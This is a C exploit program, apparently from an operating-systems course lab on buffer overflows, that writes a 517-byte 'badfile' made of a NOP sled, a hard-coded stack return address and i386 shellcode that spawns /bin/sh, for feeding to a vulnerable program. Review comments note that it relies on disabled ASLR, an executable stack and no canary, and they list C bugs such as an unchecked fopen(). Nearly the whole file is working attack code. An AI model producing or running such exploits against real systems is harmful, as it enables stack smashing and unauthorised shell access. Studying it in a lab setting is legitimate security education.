/* exploit.c */
/* A program that creates a file containing code for launching a shell */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * Payload bytes that main() copies into the output file. The per-byte
 * comments give the i386 instruction each fragment encodes: the sequence
 * pushes "//sh" and "/bin" onto the stack, points %ebx/%ecx at the result
 * and issues an `int $0x80` system call (the header comment calls this
 * "launching shell"). The literal contains no 0x00 byte, so strlen() on it
 * in main() returns the full payload length, 24 bytes; sizeof is 25
 * because of the string terminator.
 */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/*
 * Writes the 517-byte input file "./badfile" used by the lab's vulnerable
 * program. Layout produced by this function:
 *   [0, 20)            the 20 bytes of mycode (filler plus one hard-coded
 *                      stack address, see the comments below);
 *   [20, startpoint)   0x90 filler left over from memset();
 *   [startpoint, end)  the shellcode array, placed on a 4-byte boundary
 *                      just short of the end of the buffer;
 *   [end, 517)         0x90 filler.
 * argc/argv are unused.
 *
 * NOTE(review): the third line of mycode is a fixed guess at a stack
 * address, so the file only has the intended effect when the target's
 * stack layout is exactly as assumed; stack address randomisation (ASLR),
 * a non-executable stack or a stack canary in the target each defeat it
 * on their own. The author's comments record that the computed-address
 * variant was never made to work; nothing here changes that.
 *
 * NOTE(review): C correctness issues, left as-is in this documentation
 * pass: main() should return int; fopen() can return NULL (e.g. an
 * unwritable working directory) and is then dereferenced unchecked by
 * fwrite()/fclose(); the fwrite()/fclose() results are ignored, so a short
 * or failed write is silent; memset(&buffer, ...) passes a char (*)[517]
 * where a char * is expected (same address, mismatched type).
 */
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
char mycode[20] =
/* first line: valid size of buf (12 bytes) */
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
/* second line: skip past sfp (1 word) */
"\xff\xff\xff\xff"
/* third line: overwrite ret with beginning of shellcode */
/* note: stack for bof() begins at ~0xbffff2f8 +/- 0x10?*/
/* so buf starts at that minus 12(??? byte alignment) which is bffff2ec */
/* first 20 bytes are stack smasher ---> bffff300 */
/* then lots of NOPs */
/* put script at end so it falls through */
/* we'll jump somewhere shortly after our smasher -- */
/* try 0xbffff340 */
"\x40\xf3\xff\xbf"; /* this will be replaced */
/* note: write in little-endian */
/* (long*)(mycode+16)=0xbffff230; replace it here -- currently not working */
/* now put this at the beginning of badfile. */
int i;
/* 20 literal bytes exactly fill mycode[20]; there is no terminating NUL,
 * which is fine because mycode is only ever indexed, never used as a
 * C string. */
for( i = 0; i < 20; i++ )
{
buffer[i]=mycode[i];
}
/* this will now go at the end of the buffer */
/* note word alignment floor truncation */
/* Integer division then multiplication by 4 rounds the start offset down
 * to a multiple of 4. Because startpoint <= 516 - strlen(shellcode) - 20,
 * endpoint stays below 517 and the copy below never leaves buffer[]. */
int startpoint = ((516-strlen(shellcode)-20)/4)*4;
int endpoint = startpoint+strlen(shellcode);
int j = 0;
/* The bare "j" in the init clause is a no-op expression (j was already
 * set to 0 above); only "i=startpoint" has an effect there. */
for( i=startpoint,j; i < endpoint; i++,j++ )
{
buffer[i]=shellcode[j];
}
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

Note: this was for an OS assignment demonstrating the buffer overflow vulnerability in certain executables, and ways to counteract such vulnerabilities.
